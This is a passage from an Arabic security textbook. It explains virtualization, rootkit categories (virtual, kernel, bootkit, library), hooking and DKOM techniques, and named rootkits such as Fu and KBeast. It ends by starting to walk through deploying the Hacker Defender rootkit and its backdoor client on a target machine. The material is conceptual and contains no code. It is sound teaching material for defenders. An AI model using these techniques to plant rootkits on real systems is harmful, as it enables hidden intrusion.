‫اﻟطرﯾﻘﺔ اﻟﺛﺎﻟﺛﺔ ھﻲ ‪ OS-level virtualization‬وﻣن اﻻﺳم ﯾﺗﺿﺢ ان ﻧظﺎم اﻟﺗﺷﻐﯾل ﻧﻔﺳﮫ ھو ﻣن ﯾﻘوم ﺑﻌﻣﻠﯾﺔ اﻟﻌزل‪.‬‬
‫‪Virtual memory management‬‬
‫ﻣن اھم وظﺎﺋف ال ‪ hypervisor‬ھو ﺗﺣوﯾل ال ‪ physical Hardware Memory‬اﻟﻲ‪Virtual Hardware Memory‬‬
‫وﻛﻣﺎ ﻧﻌﻠم ﻓﺎن ﻣﺻطﻠﺢ ال ‪ Virtual Memory‬ﻟﯾس ﺧﺎص ﺑﻌﻣﻠﯾﺔ ال ‪ virtualization‬ﻓﻘط ﺑل ان ﻛل اﻧظﻣﺔ اﻟﺗﺷﻐﯾل اﻟﺣدﯾﺛﺔ ﺗﻘوم‬
‫ﺑﺎﺳﺗﺧدام ال ‪ Virtual memory‬وذﻟك ﻟﻛﻲ ﺗدﻋم ﻋﻣﻠﯾﺔ ال‪multiprocessing‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪438‬‬

‫اﯾﺿﺎ ﻣن اھم وظﺎﺋف ال ‪ hypervisor‬ﻋﻣﻠﯾﺔ ﻋزل ﻛل ‪ Virtual Memory‬ﯾﺳﺗﺧدﻣﮭﺎ ‪ VM‬ﻋن اﻷﺧرى‪ .‬ﻓﻛل ‪ VM‬ﯾﻛون ﻟﮫ ال‬
‫‪memory space‬اﻟﺧﺎص ﺑﮫ واﻟﺗﻲ ﻻ ﯾﺳﺗطﯾﻊ اي ‪ VM‬اﺧر اﻟوﺻول اﻟﯾﮭﺎ‪ .‬وھذه اﻟﻌﻣﻠﯾﺔ ﺗﻌرف ﺑــ‪virtual machine isolation‬‬
‫اﺳﺎﻟﯾب ال‪Virtual Rootkit‬‬
‫ﻛﻣﺎ ﻗﻠﻧﺎ ﻓﺎن ال ‪ Virtual Rootkits‬ھﻲ روت ﻛﯾت ﺑرﻣﺟت ﺧﺻﯾﺻﺎ ﻟﻛﻲ ﺗﻌﻣل ﻋﻠﻰ ال ‪ VM‬وﺗﻧﺗﻘل ﻣﻧﺔ اﻟﻲ ال ‪ Host Machine‬ﻟذﻟك‬
‫ﻓﺎن اول ﻣﮭﻣﺔ ﺗﻘوم ﺑﮭﺎ ھذه اﻟروت ﻛﯾت ھﻲ ﻋﻣﻠﯾﺔ اﻟــ ‪ Escaping from a virtual environment‬واول ﺧطوة ﻓﻲ ھذه اﻟﻌﻣﻠﯾﺔ ھﻲ‬
‫ان ﯾﻛﺗﺷف اﻟروت ﻛﯾت اﻧﮫ ﯾﻌﻣل ﻓﻌﻼ ﻋﻠﻰ ‪ VM‬وﻟﯾس ﻋﻠﻰ ﺟﮭﺎز ﺣﻘﯾﻘﻲ‪.‬‬
‫ﯾوﺟد ‪ 3‬اﻧواع رﺋﯾﺳﯾﺔ ﻣن ال‪: Virtual Rootkits‬‬
‫اﻟﻧوع اﻷول ھو )‪ Virtualization-aware malware (VAM‬وھو ﻣﺧﺻص ﻟﻠﻔﯾروﺳﺎت واﻟﺑرﻣﺟﯾﺎت اﻟﺿﺎرة ﻓوظﯾﻔﺗﮫ اﻧﮫ ﯾﻘوم ﺑﺎﻛﺗﺷﺎف‬
‫ال ‪ VM‬ﺛم ﯾﻌدل ﻣن ﺧﺻﺎﺋﺻﮫ ﻓﯾﻣﺎ ﯾﻌرف ﺑﻌﻣﻠﯾﺔ ال ‪ polymorphic‬ﺣﺗﻰ ﻻ ﯾﺳﺗطﯾﻊ ﻣﺣﻠل اﻟﻔﯾروﺳﺎت اﻟﺗﻌرف ﻋﻠﯾﺔ‪ .‬اﯾﺿﺎ ﻟدﯾﺔ وظﯾﻔﺔ‬
‫اﺧري وھو ﻣﮭﺎﺟﻣﺔ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟذي ﯾﻌﻣل ﻋﻠﻰ ال‪. VM‬‬
‫اﻟﻧوع اﻟﺛﺎﻧﻲ ھو )‪ Virtual machine-based rootkits (VMBR‬وھو اﻟﻧوع اﻟﺗﻘﻠﯾدي وھو اﻟذي ﯾﺳﺗطﯾﻊ اﻻﻧﺗﻘﺎل ﻣن ال ‪ VM‬اﻟﻲ‬
‫اﻟﺟﮭﺎز اﻷﺻﻠﻲ ﻋن طرﯾﻖ ﺑرﻧﺎﻣﺞ ال ‪ VM‬ﻧﻔﺳﮫ‪virtualization software‬‬
‫اﻟﻧوع اﻟﺛﺎﻟث ھو ‪ Hypervisor virtual machine (HVM) rootkits‬وھو أﺧطر ﻧوع ﻷﻧﮫ ﯾﻘوم ﺑﻣﮭﺎﺟﻣﺔ ال ‪ hypervisor‬ﻧﻔﺳﮫ‬
‫واﺳﺗﺑداﻟﮫ ﺑﺄﺧر ﻣﻌدل وﺑﺎﻟﺗﺎﻟﻲ اﺻﺎﺑﺔ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﻣوﺟود ﻋﻠﻰ ال ‪ VM‬وﻧظﺎم اﻟﺗﺷﻐﯾل اﻟرﺋﯾﺳﻲ‪. host‬‬
‫ﺑﻌد اﻛﺗﺷﺎف اﻟروت ﻛﯾت ﻟل ‪ VM‬ﺗﺄﺗﻲ اﻟﻣﮭﻣﺔ اﻷھم وھﻲ اﻟوﺻول اﻟﻲ ال ‪ host machine‬وﺗﺗم ﻋﻣﻠﯾﺔ اﻟوﺻول ﻟل ‪ host‬ﻋن طرﯾﻖ‬
‫اﺳﺗﻐﻼل ﺛﻐرات ‪ exploit‬ﺗؤدي ﻟﺗﻌطﯾل ‪ crash‬ﺧدﻣﺔ ‪ service‬او ﺗﻌطﯾل ﻛل ال ‪ VM‬ﻣﻣﺎ ﯾﻣﻛن اﻟروت ﻛﯾت ﻣن اﻟوﺻول اﻟﻲ ال ‪Host‬‬
‫‪ .machine‬اﯾﺿﺎ ﻣن اھم طرق ﺗﺧطﻲ ال ‪ VM‬ھﻲ اﺳﺗﻐﻼل اﻟــ ‪ ComChannel‬وھﻲ ﻗﻧوات اﺗﺻﺎل ﺑﯾن ال ‪ gust OS‬وال ‪host OS‬‬

‫ﺑﻌد ﻋﻣﻠﯾﺔ اﻟوﺻول اﻟﻲ ال ‪ Host Machine‬ﺗﺗم ﻋﻣﻠﯾﺔ اﻟﺳﯾطرة ﻋﻠﻰ ال ‪ Hypervisor‬ﻋن طرﯾﻖ ﻣﺎ ﯾﻌرف ﺑـ ‪Hijacking the Hypervisor‬‬
‫ﻓﺑﺳﯾطرة اﻟروت ﻛﯾت ﻋﻠﻰ ال ‪ hypervisor‬ﻓﮭو ﯾﺳﯾطر ﻋﻠﻰ ‪Virtualization‬وﺑﺎﻟﺗﺎﻟﻲ ﯾﺳﺗطﯾﻊ اﻟﺳﯾطرة ﻋﻠﻰ ﻛل اﻟﻧظﺎم ﺳواء ‪ VM‬او‬
‫‪.HostVM‬‬
‫ﻣن أﺷﮭر اﻧواع ال ‪ Virtual Rootkits‬ھو‬
‫‪SubVirt‬ﺑرﻣﺟﺔ ‪ Samuel T. King and Peter M.‬ﺗم ﻋﻣﻠﺔ ﻓﻲ ﺟﺎﻣﻌﺔ‪. Michigan‬‬
‫‪Blue Pill‬ﺑرﻣﺟﺔ ‪ Joanna Rutkowska‬وھو ﻣﺧﺻص ﻟﻣﻌﺎﻟﺞ‪. AMD-V‬‬
‫‪Vitriol‬ﺑرﻣﺟﺔ ‪ Dino Dai Zovi‬ﻣﺧﺻص ﻟﻣﻌﺎﻟﺞ‪. Intel VT‬‬
‫‪Kernel-Level Rootkit‬‬

‫اﻟﻧواة‪/‬اﻟﻛﯾرﻧل ھﻲ ﺟوھر ﻧظﺎم اﻟﺗﺷﻐﯾل‪ .‬ھذا اﻟﻧوع ھو اﻻﺧطر ﻷﻧﮫ ﯾﺻﯾب ﻧواة اﻟﻧظﺎم وھو ال ‪ Kernel‬وﻗدرﺗﮫ ﻋﻠﻰ اﻟﺗﺧﻔﻲ ﻛﺑﯾرة وﯾﺻﻌب‬
‫اﻛﺗﺷﺎﻓﮫ ﺑﺎﻟﺑراﻣﺞ اﻟﺗﻘﻠﯾدﯾﺔ وﯾﺣﺗﺎج اﻟﻲ ﺗﺣﻠﯾل ﯾدوي ﻷﺧﺻﺎﺋﻲ اﻟﻛﯾرﻧل ﺣﺗﻰ ﺗﺗﻣﻛن ﻣن اﻛﺗﺷﺎﻓﮫ‪ .‬وھذا ﯾﻘوم ﺑﺗﻐطﯾﺔ ‪ backdoors‬ﻋﻠﻰ‬
‫اﻟﻛﻣﺑﯾوﺗر وﯾﺗم إﻧﺷﺎﺋﮫ ﻣن ﺧﻼل ﻛﺗﺎﺑﺔ ﺗﻌﻠﯾﻣﺎت ﺑرﻣﺟﯾﺔ إﺿﺎﻓﯾﺔ أو ﻋن طرﯾﻖ اﺳﺗﺑدال أﺟزاء ﻣن ﻛود اﻟﻧواة‪/‬اﻟﻛﯾرﻧل ﻣﻊ اﻛواد ﻣﻌدﻟﮫ وﯾﺗم ذﻟك‬
‫ﻋﺑر ﺑراﻣﺞ ﺗﺷﻐﯾل اﻷﺟﮭزة )‪ (device driver‬ﻓﻲ ‪ Windows‬أو وﺣداة اﻟﻧواة )‪ (loadable kernel module‬ﻓﻲ ﻟﯾﻧﻛس‪ .‬ﻓﺈذا ﻛﺎن‬
‫ھﻧﺎك أي ﺧطﺎ او ‪ bugs‬ﻓﻲ رﻣز ‪ ،Rootkits‬ﻓﺎن ھذا ﺳوف ﯾؤﺛر ﻋﻠﻰ اﺳﺗﻘرار اﻟﻧظﺎم إﻟﻰ ﺣد ﻛﺑﯾر ﻣن ﻗﺑل ‪ Rootkits‬ﻋﻠﻰ ﻣﺳﺗوى‬
‫اﻟﻧواة‪ .‬ﻟﮭﺎ ﻧﻔس اﻣﺗﯾﺎزات ﻧظﺎم اﻟﺗﺷﻐﯾل‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﻓﮭﻲ ﺻﻌﺑﺔ اﻟﻛﺷف واﻻﻋﺗراض أو ﺗﺧرﯾب ﻋﻣﻠﯾﺎت ﻧظم اﻟﺗﺷﻐﯾل‪.‬‬
‫‪Application-level Rootkit‬‬

‫‪ Application-level rootkit‬ﺗﻌﻣل داﺧل ﺟﮭﺎز ﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ ﻋن طرﯾﻖ اﺳﺗﺑدال ﻣﻠﻔﺎت ﺗطﺑﯾﻖ ﻣﻌﯾن ﻣﻊ ‪ Rootkits‬أو ﻋن طرﯾﻖ‬
‫ﺗﻌدﯾل اﻟﺗطﺑﯾﻘﺎت اﻟﺣﺎﻟﯾﺔ ﻣﻊ ‪ ، injected code ، patches‬اﻟﺦ‪.‬‬
‫‪Hardware/Firmware Rootkit‬‬

‫‪ Hardware/firmware rootkits‬ﺗﺳﺗﺧدم اﻷﺟﮭزة أو ﻣﻧﺻﺎت اﻷﺟﮭزة )‪ (devices or platform firmware‬ﻹﻧﺷﺎء ﺻورة‬


‫ﺧﺑﯾﺛﺔ )‪ (malware image‬داﺋﻣﮫ ﻓﻲ اﻷﺟﮭزة‪ ،‬ﻣﺛل اﻟﻘرص اﻟﺻﻠب‪ ،‬وﻧظﺎم ‪ ،BIOS‬أو ﺑطﺎﻗﺔ اﻟﺷﺑﻛﺔ‪ Rootkits .‬ﯾﺧﻔﻲ ﻓﻲ ‪firmware‬‬
‫ﻷﻧﮫ ﻟن ﯾﺗم ﺗﻔﺗﯾش اﻛواد ‪ Firmware rootkit .firmware‬ﯾﻧطوي ﻋﻠﻰ اﻧﺷﺎء وھﻣﻰ داﺋم ﻣن ‪.rootkit malware‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪439‬‬

‫)‪Boot-loader-level Rootkit (Bootkit‬‬

‫)‪ Boot-loader-level Rootkit (Bootkit‬ﺗﻌﻣل إﻣﺎ ﻋن طرﯾﻖ اﺳﺗﺑدال أو ﺗﻌدﯾل ﻣﺣﻣل اﻹﻗﻼع )‪ (boot loader‬ﺑواﺣد أﺧر‪ .‬ﯾﻣﻛن‬
‫ﺗﻔﻌﯾﻠﮭﺎ ﺣﺗﻰ ﻗﺑل ﺑدء ﺗﺷﻐﯾل ﻧظﺎم اﻟﺗﺷﻐﯾل‪ .‬ﻟذﻟك‪ Boot-loader-level Rootkit (Bootkit) ،‬ھﻲ اﻟﺗﮭدﯾدات ﺧطﯾرة ﻋﻠﻰ اﻷﻣن ﻷﻧﮭﺎ‬
‫ﯾﻣﻛن أن ﺗﺳﺗﺧدم ﻻﺧﺗراق ﻣﻔﺎﺗﯾﺢ اﻟﺗﺷﻔﯾر وﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫‪Library-level Rootkits‬‬

‫‪ Library-level rootkits‬ﯾﻌﻣل ﻓﻲ ﻣﺳﺗوى اﻋﻠﻰ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل وﻋﺎدة ﯾﻘوم ﺑﺗﺻﺣﯾﺢ‪ ،‬اﺻطﯾﺎد‪ ،‬أو ﯾﺣل ﻣﺣل ‪ system calls‬ﻣﻊ‬
‫إﺻدارات ‪ backdoor‬ﻟﻠﺣﻔﺎظ ﻋﻠﻰ ﻣﺟﮭوﻟﯾﺔ اﻟﻣﮭﺎﺟم‪ .‬ﺣﯾث ﺗﻌﻣل ﻋﻠﻰ اﺳﺗﺑدال ‪ system calls‬اﻷﺻﻠﻲ ﻣﻊ واﺣده أﺧرى ﻣزﯾﻔﮫ‪/‬وھﻣﯾﮫ‬
‫ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺣول اﻟﻣﮭﺎﺟم‪.‬‬

‫‪ How Rootkits Work‬ﻛﯾف ﯾﻌﻣل اﻟروت ﻛﯾت؟‬


‫‪ System hooking‬ھو ﻋﻣﻠﯾﺔ ﺗﻐﯾﯾر واﺳﺗﺑدال ﻣؤﺷر اﻟداﻟﺔ اﻷﺻﻠﻲ )‪ (original function pointer‬ﻣﻊ ﻣؤﺷر )‪ (pointer‬ﻣﻘدم ﻣن‬
‫‪ rootkits‬ﻓﻲ وﺿﻊ اﻟﺷﺑﺢ)‪. (stealth mode‬‬

‫‪ Inline function hooking‬ھﻲ ﺗﻘﻧﯾﺔ ﺣﯾث ﯾﻘوم ‪ rootkits‬ﺑﺗﻐﯾر ﺑﻌض اﻟﺑﺎﯾت ﻣن وظﯾﻔﺔ داﺧل ‪ core system DLLs‬ﻣﺛل‬
‫)‪ ، (kernel32.dll and ntdll. dll‬ووﺿﻊ اﻟﺗﻌﻠﯾﻣﺎت ﺑﺣﯾث أن اﺳﺗدﻋﺎء أي ﻋﻣﻠﯾﺔ ﯾﻣر أوﻻ ﻋﻠﻰ ‪.rootkits‬‬

‫‪ Direct Kernel Object Manipulation (DKOM) rootkits‬ھﻲ ﻗﺎدرة ﻋﻠﻰ ﺗﺣدﯾد ﻣﻛﺎن واﻟﺗﻼﻋب ﻓﻲ أي ﻣن ﻋﻣﻠﯾﺎت اﻟﻧظﺎم‬
‫)‪ (System process‬اﻟﻣوﺟودة ﻓﻲ ھﯾﺎﻛل ذاﻛرة ‪ kernel‬وﺗﺻﺣﯾﺢ )‪ (Patch‬ذﻟك أﯾﺿﺎ‪ .‬وھذا ﯾﻣﻛﻧﮫ أﯾﺿﺎ إﺧﻔﺎء اﻟﻌﻣﻠﯾﺎت واﻟﻣﻧﺎﻓذ‪ ،‬ﺗﻐﯾر‬
‫اﻻﻣﺗﯾﺎزات‪ ،‬ﺗﺿﻠﯾل ﻣﺷﺎھد ‪ Windows event viewer‬دون أي ﻣﺷﻛﻠﺔ ﻋن طرﯾﻖ اﻟﺗﻼﻋب ﻓﻲ ﻗﺎﺋﻣﺔ اﻟﻌﻣﻠﯾﺎت اﻟﻧﺷطﺔ ﻣن ﻧظﺎم اﻟﺗﺷﻐﯾل‪،‬‬
‫وﺗﻐﯾﯾر اﻟﺑﯾﺎﻧﺎت داﺧل ھﯾﺎﻛل ﻣﻌرﻓﺎت اﻟﻌﻣﻠﯾﺔ)‪ . (PROCESS IDENTIFIERS structures‬ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ اﻟوﺻول ﻣن اﻟﻧوع‬
‫اﻟﻘراءة‪/‬اﻟﻛﺗﺎﺑﺔ )‪ (read/write access‬إﻟﻰ اﻟﺟﮭﺎز‪/‬اﻟذاﻛرة اﻟﻔﻌﻠﯾﺔ )‪. (Device\Physical Memory object‬‬
‫‪ DKOM rootkits‬ﺗﻘوم ﺑﺈﺧﻔﺎء اﻟﻌﻣﻠﯾﺔ ﻋن طرﯾﻖ ﻋدم ذﻛرھﺎ‪/‬اﺧﻔﺎﺋﮭﺎ ﻣن ﻗﺎﺋﻣﺔ اﻟﻌﻣﻠﯾﺎت‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪440‬‬

‫‪Rootkit: Fu‬‬
‫‪ Fu‬ھو ‪ infection database‬واﻟﺗﻲ ﺗﻌﻣل ﺑﺎﺳﺗﺧدام )‪ Direct Kernel Object Manipulation (DKOM‬وﯾﺄﺗﻲ ﻣﻊ اﺛﻧﯾن ﻣن‬
‫اﻟﻣﻛوﻧﺎت‪the dropper (fu.exe) ،‬و)‪ The Fu rootkit. the driver (msdirectx.sys‬ﯾﻌدل ﻓﻲ ﻛﺎﺋن اﻟﻛﯾرﻧل )‪(kernel object‬‬
‫واﻟذي ﯾﻣﺛل اﻟﻌﻣﻠﯾﺎت ﻓﻲ اﻟﻧظﺎم‪ .‬ﺟﻣﯾﻊ ﻛﺎﺋﻧﺎت اﻟﻛﯾرﻧل )‪ (kernel process objects‬ﺗرﺗﺑط ﻣﻊ ﺑﻌﺿﮭﺎ اﻟﺑﻌض‪ .‬ﻋﻧدﻣﺎ ﯾطﻠب اﻟﻣﺳﺗﺧدم ﻣﺛﻼ‬
‫ﻋﻣﻠﯾﺔ ‪ TaskMgr.exe‬واﻟذي ﯾطﻠب ﻣن ﻧظﺎم اﻟﺗﺷﻐﯾل ﻗﺎﺋﻣﺔ ﻟﺟﻣﯾﻊ اﻟﻌﻣﻠﯾﺎت ﻣن ﺧﻼل‪ ، API‬ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﯾذھب ﻟﺟﻣﯾﻊ اﻟﻠﻧﻛﺎت‬
‫اﻟﺧﺎﺻﺔ ﺑﺎﻟﻌﻣﻠﯾﺎت )‪ (process objects‬اﻟﻘﺎﺋﻣﺔ ﺛم ﯾﻌود ﺑﺎﻟﻣﻌﻠوﻣﺎت اﻟﻣﻧﺎﺳﺑﺔ‪ .‬ﯾﺄﺗﻲ ھﻧﺎ دور اﻟروت ﻛت ﻓو واﻟذي ﯾﻘوم ﺑﺈﻟﻐﺎء ﺟﻣﯾﻊ اﻟرواﺑط‬
‫اﻟﻣﺗﺻﻠﺔ )‪ (unlinked‬ﺑﺎﻟﻌﻣﻠﯾﺎت اﻟذي ﯾرﯾد إﺧﻔﺎﺋﮭﺎ‪ .‬ﻟذﻟك‪ ،‬ﯾﻣﻛﻧﺎ اﺧﻔﺎء اﻟﻌدﯾد ﻣن اﻟﺗطﺑﯾﻘﺎت‪ ،‬ﺣﯾث ﻻ ﺗوﺟد ﻋﻣﻠﯾﺔ‪.‬‬
‫ﯾﻣﻛن ‪ Rootkit: Fu‬أﯾﺿﺎ إﺧﻔﺎء وﺳرد ﻗﺎﺋﻣﺔ اﻟﻌﻣﻠﯾﺎت وﺑراﻣﺞ اﻟﺗﺷﻐﯾل )‪ (drivers‬ﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺎت ‪ Hooking‬اﻟﻣﺧﺗﻠﻔﺔ‪ .‬ﯾﻣﻛﻧك أﯾﺿﺎ‬
‫إﺿﺎﻓﺔ أي ﻣن اﻻﻣﺗﯾﺎزات ﻷي ﻣن اﻟﻌﻣﻠﯾﺎت‪ .‬ھذا ﯾﻣﻛن أن ﯾؤدي اﻟﻌدﯾد ﻣن اﻹﺟراءات ﻓﻲ ‪ the Windows event viewer‬وﺗظﮭر ﻛﺄﻧﮭﺎ‬
‫ﺷﺧص آﺧر‪.‬‬

‫‪Rootkit: KBeast‬‬
‫)‪ KBeast (Kernel Beast‬ھو ‪ kernel rootkit‬واﻟذي ﯾﻘوم ﺑﺗﺣﻣﯾل ﻧﻔﺳﮫ ﻛﺎﻧﮫ وﺣدة ﻛﯾرﻧل )‪ .(kernel module‬ﯾدﻋم إﺻدارات‬
‫اﻟﻛﯾرﻧل ‪ .2.6.35 ,2.6.32 ,2.6.18 ,2.6.16‬ﯾوﻓر اﻟوﺻول ﻋن ﺑﻌد إﻟﻰ اﻷﻧظﻣﺔ ﺑﺎﺳﺗﺧدام ﻋﻧﺻر ‪ .userland component‬ﺑﺎﺳﺗﺧدام‬
‫وﺣدة اﻟﻧواة )اﻟﻛﯾرﻧل(‪ ،‬ﯾﻣﻛن أن ﯾﺻﺑﺢ ‪ userland backdoor component‬ﻏﯾر ﻣرﺋﻲ ﺑﺎﻟﻧﺳﺑﺔ ﻟﺗطﺑﯾﻘﺎت ‪ userland‬اﻷﺧرى‪ .‬ھذا‬
‫ﯾﻣﻛﻧﮫ إﺧﻔﺎء اﻟﻣﻠﻔﺎت‪ ،‬واﻟﻣﺟﻠدات‪ ،‬واﻟﻌﻣﻠﯾﺎت )‪ (ps, pstree, top, lsof‬اﻟﺗﻲ ﺗﺑدأ ﻣﻊ اﻟﻘﯾم اﻟﻣﻌرﻓﺔ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم‪ .‬ﯾﻣﻛﻧك اﺳﺗﺧدام ﻗدرات‬
‫ال ‪ Keylogging‬ﻻﻟﺗﻘﺎط أﻧﺷطﺔ اﻟﻣﺳﺗﺧدم‪ .‬ﻟﺗﻧﻔﯾذ واﺟﮭﺔ ‪ netstat‬ﻓﻲ ‪ KBeast ،userland‬ﯾﺣﺻل ﻋﻠﻰ اﻟوﺻول اﻟﻰ اﻟﻧظﺎم ﻣن ﺧﻼل‬
‫اﺻطﯾﺎد )‪ (hocking‬ﺟدول اﺳﺗدﻋﺎءات اﻟﻧظﺎم وھﯾﺎﻛل اﻟﻌﻣﻠﯾﺎت‪.‬‬

‫ﻧﺟد اﻧﻧﺎ اﺳﺗﺧدﻣﻧﺎ اﻟﻣﺻطﻠﺢ ‪ userland‬ﻛﺛﯾرا ﻓﻣﺎ ھوا؟‬


‫ﺣﯾث ﻧﺟد ان اﻟﺗطﺑﯾﻘﺎت ﺗﻧﻘﺳم اﻟﻰ ﻧوﻋﯾن ﻧوع ﯾﻌﻣل ﻋﻠﻰ ﻣﺳﺗوى اﻟﻛﯾرﻧل وﻧوع ﯾﻌﻣل ﻋﻠﻰ ﻣﺳﺗوى اﻟﻣﺳﺗﺧدم وﻻ ﯾﺗﻌﺎﻣل ﻣﻊ اﻟﻛﯾرﻧل ﻣﺑﺎﺷرة‬
‫وھذا ﻣﺎ ﯾﺳﻣﻰ ‪ userland‬وﻗد ﻧﺟد ان ﻓﻲ ﺑﻌض اﻟﺗطﺑﯾﻘﺎت اﻟواﺣدة ﺗﺷﻣل اﻟﻧوﻋﯾن‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪441‬‬

‫ﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن اﻟﻣﻣﯾزات اﻟﺗﻲ ﯾﻣﻛن ان ﯾﻘوم ﺑﮭﺎ ‪ KBeast‬ﻛﺎﻻﺗﻰ‪:‬‬


‫‪ Hiding this loadable kernel module -‬ﯾﻘوم ﺑﺈﺧﻔﺎء وﺣدات اﻟﻛﯾرﻧل اﻟذى ﻗﺎم ﺑﺗﺣﻣﯾﻠﮭﺎ‪.‬‬
‫‪ Hiding files/directory -‬ﯾﻘوم ﺑﺈﺧﻔﺎء اﻟﻣﻠﻔﺎت واﻟﻣﺟﻠدات‪.‬‬
‫‪ Hiding process (ps, pstree, top, lsof) -‬ﯾﻘوم ﺑﺈﺧﻔﺎء اﻟﻌﻣﻠﯾﺎت‪.‬‬
‫‪ Hiding socket and connections (netstat, lsof) -‬ﯾﻘوم ﺑﺈﺧﻔﺎء اﻟﺳوﻛﯾت واﻻﺗﺻﺎﻻت‪.‬‬
‫‪ Keystroke logging to capture user activity -‬ﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻟﺗﺳﺟﯾل أﻧﺷطﺔ اﻟﻣﺳﺗﺧدﻣﯾن‪.‬‬
‫‪ Anti-kill process -‬ﻟﻣﻧﻊ ﻏﻠﻖ اﻟﺗطﺑﯾﻘﺎت ﺑﺎﻟﻘوة‪.‬‬
‫‪ Anti-remove file -‬ﻟﻣﻧﻊ ﺣذف اﻟﻣﻠﻔﺎت ﺑﺎﻟﻘوة‪.‬‬
‫‪ Anti-delete this loadable kernel modules -‬ﻣﻧﻊ ﺣذف وﺣدات اﻟﻛﯾرﻧل ﺑﺎﻟﻘوة‪.‬‬
‫‪Local root escalation backdoor -‬‬
‫‪ Remote binding backdoor hidden by the kernel rootkit -‬اﻻﺗﺻﺎل ﻋن ﺑﻌد ب ‪ backdoor‬اﻟﻣﺧﺑﺄ ﺑواﺳطﺔ اﻟروت ﻛت‪.‬‬

‫‪Hacker Defender: It is Not What You Think‬‬

‫أول اﻷﺷﯾﺎء؛ ﻻ ﺗدع اﻻﺳم ﯾﺧدﻋك‪ Hacker Defender ،‬ھو ‪ .rootkit‬أﻧﮭﺎ ﻟﯾﺳت وﺳﯾﻠﺔ ﻟﻠدﻓﺎع ﻋن اﻟﻣﺗﺳﻠﻠﯾن! ‪Hacker Defender‬‬
‫ھو ‪ rootkit‬ﺧﺎص ﺑﺎﻟوﯾﻧدوز واﻟﺗﻲ ھﻲ ﺳﮭﻠﺔ ﻧﺳﺑﯾﺎ ﻻﻓﮭم واﻻﻋداد‪ Hacker Defender .‬ھو وﯾﻧدوز روت ﻛﯾت‪ ،‬وھذا ﯾﻌﻧﻲ أﻧك ﺳوف‬
‫ﺗﺣﺗﺎج إﻟﻰ ﻧﺷرھﺎ ﻋﻠﻰ ﺟﮭﺎز وﯾﻧدوز‪ .‬ﺳوف ﺗﺣﺗﺎج أﯾﺿﺎ إﻟﻰ اﻟﺑﺣث ﻓﻲ اﻹﻧﺗرﻧت ﻟﻠﺣﺻول ﻋﻠﻰ ﻧﺳﺧﺔ ﻣن ‪ ،Hacker Defender‬ﻣن‬
‫اﻟﻣؤﻛد ﯾﺟب أن ﺗﻛون أﻛﺛر ﺣذرا ﻋﻧد ﺗﻧزﯾل وﺗرﻛﯾب اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ ﻋﻣدا)‪! (malware program‬‬

‫ھﻧﺎك ﺛﻼﺛﺔ ﻣﻠﻔﺎت رﺋﯾﺳﯾﺔ ﻣﺗﺿﻣﻧﺔ ﻓﻲ ‪ Hacker Defender‬اﻟﺗﻲ ﯾﺟب أن ﺗﻛون ﻋﻠﻰ ﻋﻠم‪،hxdef100.ini ،hxdef100.exe :‬‬
‫و‪ .bdcli100.exe‬ﻋﻠﻰ اﻟرﻏم ﻣن أن اﻟﻣﻠف ﻣﺿﻐوط‪ .‬ﺳﯾﺗﺿﻣن اﻟﻌدﯾد ﻣن اﻟﻣﻠﻔﺎت اﻷﺧرى‪ ،‬ﺳﻧرﻛز اھﺗﻣﺎﻣﻧﺎ ﻋﻠﻰ اﻟﻣﻠﻔﺎت اﻟﺛﻼﺛﺔ ھذه‪.‬‬
‫‪ Hxdef100.exe‬ھو اﻟﻣﻠف اﻟﻘﺎﺑل ﻟﻠﺗﻧﻔﯾذ اﻟذي ﯾدﯾر ‪ Hacker Defender‬ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف‪ Hxdef100.ini .‬ھو ﻣﻠف اﻻﻋداد‬
‫ﺣﯾث ﻣن ﺧﻼﻟﮫ ﯾﻣﻛن إﻧﺷﺎء اﻟﺧﯾﺎرات اﻟﺗﻲ ﻧرﯾد اﺳﺗﺧداﻣﮭﺎ وﻗﺎﺋﻣﺔ اﻟﺑراﻣﺞ أو اﻟﻣﻠﻔﺎت أو اﻟﺧدﻣﺎت اﻟﺗﻲ ﻧرﯾد أن إﺧﻔﺎﺋﮭﺎ‪ Bdcli100.exe .‬ھو‬
‫ﺑرﻧﺎﻣﺞ اﻟﻌﻣﯾل اﻟذي ﯾﺳﺗﺧدم ﻟﻼﺗﺻﺎل ﻣﺑﺎﺷرة ﻣﻊ ‪ backdoor‬اﻟﺧﺎص ب ‪.Hacker Defender‬‬
‫ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن ﺗﺣﻣﯾل اﻟﻣﻠف ‪ hxdef100.zip‬إﻟﻰ اﻟﮭدف اﻟﺧﺎص ﺑك‪ ،‬ﻓﺈﻧك ﺗﺣﺗﺎج إﻟﻰ ﻓك اﻟﺿﻐط ﻋﻠﯾﮫ‪ .‬ﻹﺑﻘﺎء اﻻﻣور ﺑﺳﯾطﺔ ﻗدر‬
